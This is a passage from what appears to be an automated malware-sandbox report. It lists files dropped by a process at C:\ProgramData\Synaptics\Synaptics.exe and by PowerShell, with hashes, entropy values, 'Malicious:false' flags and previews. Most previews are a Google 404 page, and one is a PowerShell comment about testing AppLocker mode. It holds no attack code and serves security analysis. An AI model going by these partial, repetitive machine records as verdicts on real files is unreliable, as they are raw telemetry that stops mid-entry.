                                                                                                                                                                    SHA-512:4FDF7F58D5287135EFBEADD4ED484AE759547B77D5462FA41A20E0FFBD53F40BCF63771CA847129D895192624CA6E8363FEE7DD50AB2B643C28CEB5B721D5D31
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="timd0CZisH82900btgFh5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.271547037767635
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+00SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                                                                                    MD5:080900B9A775DF6577831D46DE457464
                                                                                                                                                                    SHA1:5834D2563E8B57A24F287272FD1AF42E0D7AFE23
                                                                                                                                                                    SHA-256:4C717D9DBCCF7E67E17120C7019FB9EBCC6565AB8A1F2FD7DBA95E6DBF3E4006
                                                                                                                                                                    SHA-512:DF0C76D64E184E25E47741BCAA1106CAF4924F3FE23C4E256F80D6E538C08E38971F5F86FB809B591841356CB0419594607B51A464345BAA83DC5EFCE7064EE9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P6q9uXgnH5OBFZNA1IwioA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.261559991799064
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0aSQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+bx+pAZewRDK4mW
                                                                                                                                                                    MD5:BB3C6CAE3469F1AC99A0652399146363
                                                                                                                                                                    SHA1:B6FE4A8DF428E64E3AEBE05CAA4CBED91E3402DF
                                                                                                                                                                    SHA-256:25473C5D857DE67C82EAB81779131BDBFB49B5A9EF77F9E1187730E4C5F5158B
                                                                                                                                                                    SHA-512:101B1532FB1EDBBB3514ABA98419060F2786BF7CA36AB913E8843D88580DEB95236D801F148FAFF51652D2E11E04A3E442BF90AE00F4803B53A1EF391CE36FEE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IO07GFsGrQeVT5wI1gktHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.256329237252335
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0u3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                                                                                                    MD5:98402E7B71617DCDE1C3D9E01935F3FB
                                                                                                                                                                    SHA1:76D544BC94ECB696938CC3722CA16953C165D91B
                                                                                                                                                                    SHA-256:E66AB372F76624C288BBB27D1C4F9C5247DE52CADB6B025F07AE5278EBCC3B0C
                                                                                                                                                                    SHA-512:AC81A95B503A873524AAF9ED499441C8AB1F267BDFB2E0A07F68C1530FDA30AA1643AD6CDD56C04786E9F7FA0DF09EE3D702CDFA53FE2770EA64C80CD2DB321E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Bnjnf_wGcv9bJopOzGfyYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2640487939249345
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                                                                    MD5:BE343E2C7144E67EDF577003F3D6A871
                                                                                                                                                                    SHA1:8EA7A0D9AAB1866D97980A7F5C3D9A19D8B830D2
                                                                                                                                                                    SHA-256:7C6AEDD21E026CF6968967F5A01B1BE31790266D61524307A9DF79E361303390
                                                                                                                                                                    SHA-512:42B0BA29C82A61992A63362510132D73999913131BE10F860EC3C55A53B8D45218CE59FA65381D947BF0E3E51D10FFD74E7C584CAED53B5DD3374B7B4BBAF71F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OYdzE8H5gTWGzbgvRT7Amg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2684270868677405
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0pESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+QE+pAZewRDK4mW
                                                                                                                                                                    MD5:57D7CC9E9A993AC8E97264B94F350974
                                                                                                                                                                    SHA1:2CE68434AC6D308A499E22AAE4C8037D95EEE79E
                                                                                                                                                                    SHA-256:B9D5E11F4C1C0D209305C9D8E87E0C512D60888021A23C9C4368DC4B029C2B29
                                                                                                                                                                    SHA-512:FFC8DF991DD977214E6104EB686C039BCFE693FC4652E8565A9313773AD2EF83D4CA27D636F94440048B2A0E37874BE4C6AE65FEA687F45E1CD1A821B3AC2E0C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="416aFCHKoNByvXO9nXW5rw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.259759960662659
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0tSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u+pAZewRDK4mW
                                                                                                                                                                    MD5:1C9AE0BB550142B5383D7072EFC015D8
                                                                                                                                                                    SHA1:15621568AF51D75575939C3D4A5705A5E70BD1CE
                                                                                                                                                                    SHA-256:B4FA728B102365B83F15AD2FE85135B2F80405CCEFDB40759013A5EAFEFA5044
                                                                                                                                                                    SHA-512:98B9F7DF537D6660D358E5275B3F609811EE72180647A3C0A087AEB4A302C7222EA615D2174562F48E9F2447A3D77B69CBC95232EB44E6A12BB8089A542912D9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TGz05i4U0NSinMr3N7nHLQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.261912045742189
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0MzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                                                                    MD5:0E985BEF6A2BD61945292AF04BAADA8D
                                                                                                                                                                    SHA1:E3DA893373284946D332FE88AA140ECF92461A3A
                                                                                                                                                                    SHA-256:93DEC8ABA415E134FA71A7EE6E062C084DCD0FA30BF5F3F4B919F6DC8268C7AB
                                                                                                                                                                    SHA-512:05B9D63113CEED194EF5C6F290B69A63E57298F2C42CAB61D5EFA5B509AAFFE0D9A1D35FD5E020CFCEA0AA9235DC3434EEEC7AE462A8389B937470246CF470BD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="avqQDpd0pxkmNWNN4J9dKA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.278442768390637
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0USU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                                    MD5:07F230705AFE352A46E23095703AE353
                                                                                                                                                                    SHA1:85A9BA16B08020BF1D017A22184A0BD8E0E3C212
                                                                                                                                                                    SHA-256:1F641A581120602F4D8BF05CAB70473C1207FF9E84371DFE1BF915004DA45CD7
                                                                                                                                                                    SHA-512:1CCDE588ABD0BC29CA21875365A520C7757C215626E51D8ADB0429708A721B18198D46C938C70306AF95730BE6E2B9CBB53070654D9FF1DC35B3D4749BA795D2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HGeD3lGCbfZkh6LNJVB1MQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.268172981776523
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0fP+3XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6GH+pAZewRDK4mW
                                                                                                                                                                    MD5:6452A75D86F67B92279057D6D6F8366C
                                                                                                                                                                    SHA1:E536861C7ACE2FA3AC8037D8EAF439DAA05180A6
                                                                                                                                                                    SHA-256:4CD13019281A57781949FD9C323105E0668AED6A1434F9477BFBE0828A0B594E
                                                                                                                                                                    SHA-512:B9E75D6E7881AE3053A314007377857CF43FD0B09A8E22376FFB8F53BCC1D7214923A5A6332872743415E64DCB1F1E86A04D6469BC8D72FDF9DFD29D3A915AAD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7ihWK2Xnjy8Gkx9FG3BaWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2610645556926485
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0NbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0b+pAZewRDK4mW
                                                                                                                                                                    MD5:3FB3E8A40D5789445FB9BA54DD87F5E0
                                                                                                                                                                    SHA1:B93577CEB2258E26408A1F455EB0CBFF98BAFC32
                                                                                                                                                                    SHA-256:12F8118CE919450114BE6D6FAC66D466B37ABBF36206049C4E73E6FAD16EAED0
                                                                                                                                                                    SHA-512:A8E8F359EBCAD571221BF7A7D92B4EC927F32F3DF98F3856FF35D9EF09CF309A647E04E2430015AA4DEB8B7DD7C4C38CD2CFBBCDA6E254F29B2520C144DB14D0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.268108386622194
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0seBSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a+pAZewRDK4mW
                                                                                                                                                                    MD5:33AA3D6EDDABE67E878A2245421BAA6B
                                                                                                                                                                    SHA1:AE5DE1D54E0CE7119301891191B949D57692A081
                                                                                                                                                                    SHA-256:CC62380B4505CDF6EC6B7DBF8D0F1EEB37D21751399CBCAFA502F37D134542B2
                                                                                                                                                                    SHA-512:F580E1C6376028FB239C5598EA65932D1EDB67C9A626F37EC38F41FAE9A50BF0622C45FAD2C38739E9BE25799048E14F21B7D853CEB5E33939DECAE388C395BA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2777548675629555
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0E9nKSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+HK+pAZewRDK4mW
                                                                                                                                                                    MD5:0ADF8913D4E38FA43C77F3CA684BF2CD
                                                                                                                                                                    SHA1:525D5427D56481D0C0026AB572D8A3B40FC2B9CE
                                                                                                                                                                    SHA-256:EE0A2A1228F64506881F18AC11C2505A67A8BDE92B4FA3699B218FFC096BE819
                                                                                                                                                                    SHA-512:965271E06B96FBEEFF4C1F9CB40BC882CE4F29E299A698848A57F8B8EB9C8BBED9254D4C5BC1DB5D8B0ED9B643E69C0A36FF08DA1074278E51860FE5F27BFAEA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.257594998541933
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0USU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H+pAZewRDK4mW
                                                                                                                                                                    MD5:D6099B025E67E6B9DC7C80F3CFB3AAD5
                                                                                                                                                                    SHA1:D79392A1D62A305B600A7D629ABCB8B3BCAD7CEE
                                                                                                                                                                    SHA-256:EA473946C038DD750672B0517FE0DFB2400479D68CD6334F78CB7DD5540D662B
                                                                                                                                                                    SHA-512:0834C7CBC575C452B4968843FA6EA1A8C5395808FB5AA018AEB5FC05EDF5408DDC39D38C68392D88BB183EFBAE00C594869F9D3DE82DE9CF7CD3C340AC8C9BFB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2520129891956175
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0cpUCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j/+pAZewRDK4mW
                                                                                                                                                                    MD5:DACEB27A266EEEA3BAC285C1A508D25F
                                                                                                                                                                    SHA1:20E90D0DDEDAF306E8C45B663E35BD5E55DBDCE0
                                                                                                                                                                    SHA-256:8EB40CEFA9D717A241056AF6092E6504A37271149D78EE8204D801080232B8DF
                                                                                                                                                                    SHA-512:EE7C688841E091D33BFA074D83C636A8258FC5D28DBD985940935DEAE91DCEBDCE29987DE1089FF8B502AB7CFD1FA575A5AB76492BFCB0F5A7D2153D2A1F8832
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.251656231991704
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                                                                                                    MD5:D9492897F127F6FCAF265B130FADF21D
                                                                                                                                                                    SHA1:6ACA4429CA892926618165BAE9DE8066CAD86CD9
                                                                                                                                                                    SHA-256:2D9ABD0B0868D5ED0C90D093366906411AC4B015647222E62EC5EC0F88BA05DA
                                                                                                                                                                    SHA-512:8A65E0415F38008E1D1003298A5E097FA12F33D9528576C6A7E3DA59FD4CA9493C6538E4B44A00A4B49B1CE7F4B9EDE7B5CADEFDD5FAFEC667A6C8FB89DE07A2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.255847446214183
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0o4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+S+pAZewRDK4mW
                                                                                                                                                                    MD5:51C5C260A277A7B44DEAF75523EF59F9
                                                                                                                                                                    SHA1:6B8393D03B22B1CD537DC76E6A9D6A31CFAE7B0B
                                                                                                                                                                    SHA-256:6400B74885318748F69AC940FF72C9EA48B7E1495ACE00CFDF6C4F335FB99341
                                                                                                                                                                    SHA-512:DCC19FD559C6C212F2833C98F62B8CCE4A3AB630641F1D74EA0DE2DABCF63D9146A91AEB570826362153395F1A7F70ED86868C55E30D46D871C211BB9E7BF397
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.25661763058373
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+06jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Tj+pAZewRDK4mW
                                                                                                                                                                    MD5:26F0507B0DC6D0544D71BB6E58BAB785
                                                                                                                                                                    SHA1:3ADEACE89015FEC9626231BC290B927CD0C42A9F
                                                                                                                                                                    SHA-256:FD4F4985E0D682959247FDDDCCF824610BC2D4D50085581596FE888B46B3A00F
                                                                                                                                                                    SHA-512:D53D46DA9130833247478DA3C9B9E88C5072D74101A92E7F6B1D0F1BC54AA2F3943B5972D5ECF34F6896AC477061D817EB3881D9C6CEF5E0E85F8611D1F4ACC2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.264306950689819
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0NKSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+iK+pAZewRDK4mW
                                                                                                                                                                    MD5:1C1E7CAC8701EEEC696B04230AAE2824
                                                                                                                                                                    SHA1:E942A5A295E3B717EFE531267A1F679297498B4F
                                                                                                                                                                    SHA-256:B7F47F8D38F1F7201F224E5D0A0C556CC5EBB630B1ED1F710A183F659601CBBD
